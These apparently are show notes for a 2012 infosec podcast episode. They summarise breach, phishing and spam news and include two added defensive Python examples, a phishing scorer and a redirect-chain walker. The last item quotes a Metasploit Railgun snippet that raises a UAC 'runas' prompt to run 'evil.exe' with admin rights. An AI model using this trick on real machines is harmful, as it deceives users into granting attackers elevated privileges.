Your daily source of Pwnage, Policy and Politics.


Episode 558 – Care2, AA Phishing, Yea! India, Israel CC & BigMac Scam/Spam

InfoSec Daily Podcast Episode 558 for January 3, 2012.  Tonight's podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
 

Announcements:

Brad Smith (theNurse)
We all know and love Brad Smith, aka theNurse.  His humor and smiling positivity are a wonderful example for our community.  At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.

Brad and his wife did not ask for this help, but as a community we feel that if we can help, we want to.  Please feel free to check in for status or to donate.  Either way we thank you, and I know Brad thanks you for your support, prayers and positive thoughts.

http://www.social-engineer.org/brad-smith-updates/
http://www.social-engineer.org/bradsmithdonation/

CampusCon 2012
When: January 21, 2012
Where: WIT {Waterford Institute of Technology} Sports – Waterford, Ireland
http://campuscon.hackingwit.com
(from Baconzombie)

SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
When: Starts January 24, 2012
Where: Atlanta, GA
Discount Code:
http://www.sans.org/mentor/details.php?nid=25484

ShmooCon 2012
When: January 27th-29th, 2012
Where: Washington Hilton Hotel, Washington, DC
http://www.shmoocon.org

Social Engineering Training
When: March 5-9
Where: Seattle, Washington
When: April 9-13
Where: Bristol, UK
http://www.social-engineer.com/social-engineer-training

Linuxfest Northwest 2012
When: Saturday, April 28th-29th, 2012
Where: Bellingham Technical College – Bellingham, WA
http://www.linuxfestnorthwest.org/
CFP now open!

AIDE 2012
When: May 21-25, 2012
Where: MU Forensic Science Center
Huntington, West Virginia
http://aide.marshall.edu
CFP now open!

DerbyCon 2012 – "Dropping the Deuce"
When:  September 27-30, 2012
Where: Louisville, KY
http://www.derbycon.com

Thanks to everyone that has purchased products from Amazon through the affiliate program.  If you’re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.

Stories

Source:  http://www.care2.com/care2blog/to-all-care2-members-security-breach.html

The website of Care2, an organization that's all about living a healthy, green lifestyle, was breached in the last days of December by an unknown group of attackers who managed to access the login information of a number of the site's members.

The official statement released by the company says that only a limited number of Care2 member accounts were accessed, but as a precaution all 17,911,623 account holders will be required to change their password at their next login.

“We sincerely apologize for this inconvenience. Given our large membership size, we have become a significant target for spammers and hackers over the past few years, and this was the first hacking attempt that successfully breached our protective walls,” Care2 representatives wrote on the site’s blog.

The vulnerabilities the attackers used to get in were patched immediately to prevent further access, but the incident is still under investigation to determine the full extent of the breach.

The FBI has been contacted to investigate the matter, but so far the only clues to the identity of the attackers are some IP addresses in Russia. That doesn't necessarily prove the attack was launched from there; the attackers may simply have routed through compromised machines in that country.

Since no financial information is stored in the site's databases, the attackers may have targeted Care2 to harvest passwords they can later try against other accounts, including ones that hold more sensitive data.

This is exactly why users are advised to change their password not only on the breached site but on every other site where they reused it, and to do so quickly: once the attackers have the credentials, they will try them elsewhere before their victims get around to doing anything about it.
….
Source:  http://news.softpedia.com/news/American-Airlines-Fake-Ticket-Purchase-Scams-Hit-the-Roof-243983.shtml
We have written before about the fraudulent emails that target American Airlines customers, but these scams have recorded a considerable increase, and that's why I think this is a good opportunity to remind everyone of the plot. We'll also take a look at the company's official statement on the matter.

After reading the previous article, dozens of readers shared the fake emails they had received, which told them that a ticket had been purchased using their credit card.

The phony emails that bear the subject “Re: Your Flight Order N590” look something like this:

Dear Customer,
FLIGHT ELECTRONIC NUMBER 8532856
DATE & TIME / NOVEMBER 28, 2011, 11:17 PM
ARRIVING: NEW YORK JFK
TOTAL PRICE : 278.02 USD

Targeted customers report that the name of the destination may vary, Tulsa, Worcester, Oxnard, Stockton, Long Beach, Chicago and Houston being among the names mentioned in the email.

After noticing that the number of false notices had increased considerably and had even spread to fax machines, the company moved quickly to warn flyers about the scam.

“American Airlines will never ask you to perform security-related changes to your account in this fashion or send emails to collect user names, passwords, email addresses or other personal information,” reads the company’s statement.

“If you receive an email claiming to be from American Airlines, that asks for account information, it should be considered fraudulent and an attempt to obtain personal information that may be used to commit fraud. If you receive a phishing fax, please disregard and destroy the fax.”

Users who come across similar emails or faxes are advised to delete them immediately rather than open the attachments or follow the links that accompany the messages.

In addition, here are some things that give away a phony notice:

- phony messages always ask for personal information;
- they address the recipient with a generic title such as "Dear Customer";
- they make false threats and claims, warning users that their account will be terminated or their credit card will be charged;
- in most cases they are full of typos or poor grammar, since the majority are sent by criminals based outside the US.
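Those tells are easy to turn into a first-pass filter. The following is an added example, not code from the original article or from American Airlines: it scores a raw message against the four giveaways listed above plus one more that the company's statement implies (links and sender addresses that don't belong to the airline's domain). The two sample messages are constructed for the example; the phishing one is modelled on the fake notice quoted above, and every sender address and URL in them is invented.

```python
import re

# Constructed sample modelled on the fake "American Airlines" notice quoted in the
# story; the From: address and the link are invented for this example.
SAMPLE_PHISH = """From: American Airlines <noreply@aa-booking-confirm.example>
Subject: Re: Your Flight Order N590

Dear Customer,
FLIGHT ELECTRONIC NUMBER 8532856
DATE & TIME / NOVEMBER 28, 2011, 11:17 PM
ARRIVING: NEW YORK JFK
TOTAL PRICE : 278.02 USD
Your card has been charged. If you did not make this purchase
please confirm your account password at http://aa.com.verify-ticket.example/login
or your account will be terminated.
"""

# Constructed sample of a benign confirmation, for contrast.
SAMPLE_LEGIT = """From: American Airlines <notify@aa.com>
Subject: Your itinerary

Dear Jane Doe,
Thank you for booking with us. Your confirmation code is ABC123.
View your trip at https://www.aa.com/reservation/view
"""

GENERIC_GREETING = re.compile(r"^\s*dear\s+(customer|user|member|client)\b", re.I | re.M)
THREAT = re.compile(r"(account|card)\s+(will\s+be|has\s+been)\s+(terminated|suspended|charged|locked)", re.I)
CRED_REQUEST = re.compile(r"\b(confirm|verify|update)\b.{0,40}\b(password|account|card\s+number|credentials)\b",
                          re.I | re.S)
URL_HOST = re.compile(r"https?://([^/\s]+)", re.I)
FROM_DOMAIN = re.compile(r"^From:.*?<[^@>]+@([^>]+)>", re.I | re.M)


def host_matches(host: str, expected: str) -> bool:
    """True if host is the expected domain or a subdomain of it (not a look-alike prefix)."""
    host = host.lower()
    return host == expected or host.endswith("." + expected)


def score_message(raw: str, expected_domain: str = "aa.com") -> dict:
    """Return which tells fired, a weighted score, and the off-domain links found."""
    tells = {}
    if GENERIC_GREETING.search(raw):
        tells["generic_greeting"] = 1
    if THREAT.search(raw):
        tells["threat_or_false_claim"] = 2
    if CRED_REQUEST.search(raw):
        tells["asks_for_personal_info"] = 3
    m = FROM_DOMAIN.search(raw)
    if m and not host_matches(m.group(1), expected_domain):
        tells["sender_domain_mismatch"] = 2
    suspect_links = [h for h in URL_HOST.findall(raw) if not host_matches(h, expected_domain)]
    if suspect_links:
        tells["link_domain_mismatch"] = 3
    return {"score": sum(tells.values()), "tells": tells, "suspect_links": suspect_links}


def is_phishy(raw: str, threshold: int = 4) -> bool:
    """Threshold chosen so that a generic greeting alone is not enough to flag a message."""
    return score_message(raw)["score"] >= threshold


if __name__ == "__main__":
    for name, msg in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, score_message(msg))
```

The domain check is the part worth copying: `aa.com.verify-ticket.example` starts with the airline's name but is a subdomain of a stranger's domain, which is exactly the trick that hovering over a link exposes. The typo/grammar tell from the list is deliberately left out, since it cannot be scored reliably with a regex.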
….
Source:  http://www.news24.com/SciTech/News/India-becomes-junk-mail-hotspot-20120103
India has emerged as the world's top source of junk mail as spammers make use of lax laws and absent enforcement to turn the country into a centre of unsolicited e-mail.

A recent report by Kaspersky Lab, a Moscow-based global internet security firm, says more spam was sent from the south Asian giant than anywhere else in the world in the third quarter of the year.

An average of 79.8% of e-mail traffic in the three months to the end of September was junk. Of that, 14.8% originated in India, 10.6% came from Indonesia, and 9.7% from Brazil.

Darya Gudkova, a spam analyst at Kaspersky, said the statistics reflect a growing trend for spam to be sent from computers in Asian and Latin American countries.
….
Source: http://www.jpost.com/International/Article.aspx?id=251943&R=R4
The hackers published the list of card numbers, names and other personal details on the One sports website, which they had compromised.

The hackers published a 30 megabyte file containing the details.  Israeli credit card companies have urged their customers to remain calm and said they are taking all the required steps to secure the affected accounts.

Visa CAL announced that it would suspend all accounts that were detailed in the post. The company said it would contact the affected customers Tuesday and issue them new credit cards.

The Bank of Israel announced it would review the matter.

According to Army Radio, the hackers encouraged readers to use the information posted online to make purchases, and said they would continue to publish more account information already in their possession.
….
Source:  http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter
Trend recently found Twitter spam touting "gift cards" at the tail end of the gift-giving season. In this run, Twitter users are lured into clicking a shortened URL accompanied by the string "#mcdonalds gift card." McDonald's is a globally known fast food chain that, like many other establishments, offers certificates and vouchers for patrons who want to give them as gifts or rewards.

Unfortunately, closer inspection of the shortened link reveals a URL that has nothing to do with McDonald's gift certificates. Instead, the link leads to an unrelated site whose "Join Now" button triggers a chain of redirections that finally lands on an adult dating site.

We consider the URLs used in this attack malicious because of the deceitful way they are used. The lure "#mcdonald's gift card" would certainly have led a number of users to believe that gift certificates or vouchers were being given away or discounted.

A couple of weeks ago in the US, attention was drawn to a Mystery Santa who donated $500 worth of McDonald's gift cards to a nearby homeless shelter. Whether or not the spammers took their social engineering idea from this cannot be confirmed, but in any case users are advised against clicking on links without first inspecting them. Here, hovering over the link would have given users a clue about how to proceed. Another context clue to the illegitimacy of this spam is that users may find themselves mentioned in the same tweet as unfamiliar accounts they do not normally follow; this is because the spam bot mentions several victimized Twitter accounts in the same spammed tweet.
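Hovering shows only the first hop; the whole chain of redirections is what matters, and it can be walked safely without rendering any page. The following is an added example, not code from the Trend Micro post or from Twitter: it follows 3xx hops one at a time, resolves relative Location headers, stops on loops, and then checks whether the final host has anything to do with the lure keyword. The redirect chain it walks is constructed for the example (none of the hosts are from the original report); the `live_head` helper at the end does the same with real HTTP HEAD requests and is the only part that touches the network.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

# Constructed stand-in for the shortened "#mcdonalds gift card" link and the
# tracker behind it: url -> (status, Location header). None of these hosts are real.
FAKE_WEB = {
    "http://short.example/x7":             (301, "http://promo-tracker.example/go?id=1"),
    "http://promo-tracker.example/go?id=1": (302, "/landing"),          # relative Location
    "http://promo-tracker.example/landing": (200, None),
    "http://loop.example/a":               (302, "/b"),                # a redirect loop
    "http://loop.example/b":               (302, "/a"),
}

REDIRECT_CODES = (301, 302, 303, 307, 308)


def fake_head(url):
    """Offline HEAD: returns (status, Location) from the constructed table."""
    return FAKE_WEB.get(url, (404, None))


def expand(url, head=fake_head, max_hops=10):
    """Walk the redirect chain hop by hop. Returns (chain, final_status_or_reason)."""
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        status, location = head(url)
        if status not in REDIRECT_CODES or not location:
            return chain, status
        url = urljoin(url, location)      # Location may be relative to the current hop
        chain.append(url)
        if url in seen:
            return chain, "loop"
        seen.add(url)
    return chain, "too_many_hops"


def lure_matches_destination(chain, lure_keyword):
    """Does the final host mention the brand the tweet dangled? If not, treat it as bait."""
    final_host = urlparse(chain[-1]).netloc.lower()
    return lure_keyword.lower() in final_host


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None   # hand the 3xx back to the caller instead of following it


def live_head(url, timeout=5):
    """Real HEAD request that does not auto-follow; drop in as expand(url, head=live_head)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as e:   # 3xx surfaces here because we refused to follow
        return e.code, e.headers.get("Location")


if __name__ == "__main__":
    chain, status = expand("http://short.example/x7")
    print(" -> ".join(chain), status)
    print("lure matches destination:", lure_matches_destination(chain, "mcdonalds"))
```

The chain walker is deliberately separated from the transport so the same logic runs against the constructed table offline or against `live_head` for a real shortened link; with `live_head` the walk still never fetches a body or runs script, which is the point of inspecting before clicking.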

Source:  http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html
IF TIME: the mubix blog post regarding UAC elevation

A number of times during tests I've actually run into those mythical creatures called "patched Windows machines". At DerbyCon Chris Gates and I released the "Ask" post module (which I had failed to publish). This module very simply uses the ShellExecute Windows function via Railgun with the undocumented (but very well known) operator of 'runas'.

# Register ShellExecuteA (shell32.dll) with Railgun so Meterpreter can call it directly
client.railgun.add_function('shell32', 'ShellExecuteA', 'DWORD', [
  ['DWORD', 'hwnd', 'in'], ['PCHAR', 'lpOperation', 'in'], ['PCHAR', 'lpFile', 'in'],
  ['PCHAR', 'lpParameters', 'in'], ['PCHAR', 'lpDirectory', 'in'], ['DWORD', 'nShowCmd', 'in'],
])

# The 'runas' verb makes the shell raise the UAC prompt for evil.exe (nShowCmd 5 = SW_SHOW)
client.railgun.shell32.ShellExecuteA(nil, 'runas', 'evil.exe', nil, nil, 5)

This would quite simply hit the user with that annoying UAC prompt asking them to run 'evil.exe' with administrative privileges. If they are not "Admins" themselves, it would prompt them for a user name and password.

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.